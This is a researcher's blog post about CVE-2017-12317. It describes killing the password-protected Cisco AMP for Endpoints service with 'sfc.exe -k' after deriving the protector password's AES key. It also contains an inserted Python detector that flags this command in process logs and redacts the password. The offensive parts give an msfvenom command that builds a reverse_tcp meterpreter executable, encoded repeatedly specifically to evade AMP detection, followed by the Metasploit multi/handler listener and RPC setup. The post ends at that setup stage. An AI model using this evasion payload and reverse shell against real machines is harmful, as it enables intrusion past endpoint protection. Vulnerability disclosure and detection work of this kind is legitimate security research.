AMPutations : Disabling Cisco AMP for Endpoints before detection

Edited 1/22/18: The original posting of this was removed temporarily pending Cisco patch of the issue. The newest connector version addresses the ability to obtain the decryption key via anti-debugging, however the key still has not been changed and this method still works for disabling the connector. The CVE assigned to my findings is: CVE-2017-12317

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171020-ampfe

Original post October 2017:

Cisco AMP for Endpoints has a Connector Password Protection feature. This protects the application from being uninstalled and the service from being disabled.

However, with the password protection feature enabled, it is possible to kill the NOT_STOPPABLE, NOT_PAUSABLE service using the sfc.exe command line:

sfc.exe -k {protector password}

Reverse engineering the uninstaller allows us to derive the AES decryption key that is used to encrypt the protector password. The password itself is stored encrypted and finally encoded to BASE64 in the policy.xml file.

FOR THIS TESTING WE ARE USING A WINDOWS 10 64 BIT VM – (WinDev1709Eval w/ Windows Defender Disabled)

Unstoppable Service

If you attempt to stop the service, even via an elevated prompt, you will fail.

The only way to stop it while AMP is running is via uninstall or passing the SFC.EXE -k command-line with a valid password – this too must be done using an elevated prompt.
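Because the -k switch is the only supported way to stop the connector while it is running, a process-creation log entry showing sfc.exe launched with -k is a high-signal event for a defender to alert on. The following is an added example (not code from the original post or from Cisco) that scans Sysmon Event ID 1 style process-creation records for that pattern and redacts the password argument before the alert is stored. The event field names, the AMP install path and every sample record are constructed for this example.

```python
import ntpath
import re

# Constructed sample process-creation events in the shape of Sysmon Event ID 1
# (Image, CommandLine, User, IntegrityLevel). Not real telemetry; the AMP
# install directory is a placeholder assumption.
SAMPLE_EVENTS = [
    # Windows System File Checker: same file name, /-style switches, benign.
    {"Image": r"C:\Windows\System32\sfc.exe",
     "CommandLine": "sfc.exe /scannow",
     "User": "LAB\\helpdesk", "IntegrityLevel": "High"},
    # AMP connector kill switch with the protector password on the command line.
    {"Image": r"C:\Program Files\Cisco\AMP\<version>\sfc.exe",
     "CommandLine": "sfc.exe -k S3cretProtectorPw",
     "User": "LAB\\jdoe", "IntegrityLevel": "High"},
    # Same thing, full quoted path and upper-case switch.
    {"Image": r"C:\Program Files\Cisco\AMP\<version>\sfc.exe",
     "CommandLine": '"C:\\Program Files\\Cisco\\AMP\\<version>\\sfc.exe" -K anotherpw',
     "User": "LAB\\jdoe", "IntegrityLevel": "High"},
    # A copy of the binary run from a user directory; still matched by name.
    {"Image": r"C:\Users\jdoe\Downloads\sfc.exe",
     "CommandLine": "sfc.exe -k pw",
     "User": "LAB\\jdoe", "IntegrityLevel": "High"},
    # Constructed negative case: a switch that merely starts with -k.
    {"Image": r"C:\Program Files\Cisco\AMP\<version>\sfc.exe",
     "CommandLine": "sfc.exe -key foo",
     "User": "LAB\\jdoe", "IntegrityLevel": "High"},
]

# "-k" as a whole token, any case, anywhere after the image name.
KILL_SWITCH = re.compile(r"(?:^|\s)-k(?=\s|$)", re.IGNORECASE)
# The token following -k is the password; mask it so the alert never stores it.
PASSWORD_ARG = re.compile(r"((?:^|\s)-k\s+)\S+", re.IGNORECASE)


def is_amp_kill(event):
    """True when the image file is named sfc.exe and the command line carries -k.

    The Windows System File Checker uses /-style switches, so a -k token on an
    sfc.exe command line is the AMP connector's kill switch, not SFC."""
    if ntpath.basename(event["Image"]).lower() != "sfc.exe":
        return False
    return KILL_SWITCH.search(event["CommandLine"]) is not None


def redact(cmdline):
    """Replace the password argument with a marker; leaves other text intact."""
    return PASSWORD_ARG.sub(r"\1<redacted>", cmdline)


def scan(events):
    """Return one alert dict per matching event, with the password redacted."""
    alerts = []
    for ev in events:
        if is_amp_kill(ev):
            alerts.append({
                "rule": "amp_connector_kill_switch",
                "user": ev["User"],
                "integrity": ev["IntegrityLevel"],
                "image": ev["Image"],
                "command_line": redact(ev["CommandLine"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Matching on the file name rather than the install path catches a connector binary that has been copied elsewhere, while the whole-token check keeps SFC's own invocations and other -k-prefixed switches out of the alert stream. Redacting the argument matters because the protector password is a credential; it should not end up in SIEM storage or ticket text.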


Meterpreter Setup

First let's build an executable we can run on the target machine that will spawn a reverse_tcp meterpreter session back to a Kali box. We want to evade simple detection by AMP, so let's build it using MSFVENOM:

msfvenom -p windows/x64/meterpreter/reverse_tcp -b '\x00' lhost={KALI IP} lport=8443 -i 10 -f exe -o {OUTPUT EXE FILENAME}

The ‘-p’ selects our payload and ‘-b’ specifies that null bytes are bad. Make sure you select the correct architecture for the payload as well (‘x64’ or ‘x86’) for your target operating system.

As with setting up any payload we also include our Kali/MSF host via LHOST and LPORT.

We set ‘-i’ to 10. This means the payload will be encoded through 10 iterations. At the time of writing, 10 iterations of this standard payload are detected, but increasing the iteration count solves this problem.

The ‘-f’ specifies the file format we want, so targeting a Windows 10 system, we will choose EXE for simplicity and set our output file with ‘-o’.


Metasploit Setup

Load up metasploit:

msfconsole

Once loaded, let's set up a listener for our reverse shell using exploit/multi/handler:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST {YOUR KALI IP}
set LPORT 8443
set ExitOnSession false
exploit

Now you are successfully set up to wait for the target to run the malicious EXE.

Later, in our post-run, we will be using a Python script that accesses the MSF RPC, so we will run one additional command in the msfconsole:

load msgrpc Password=abc123
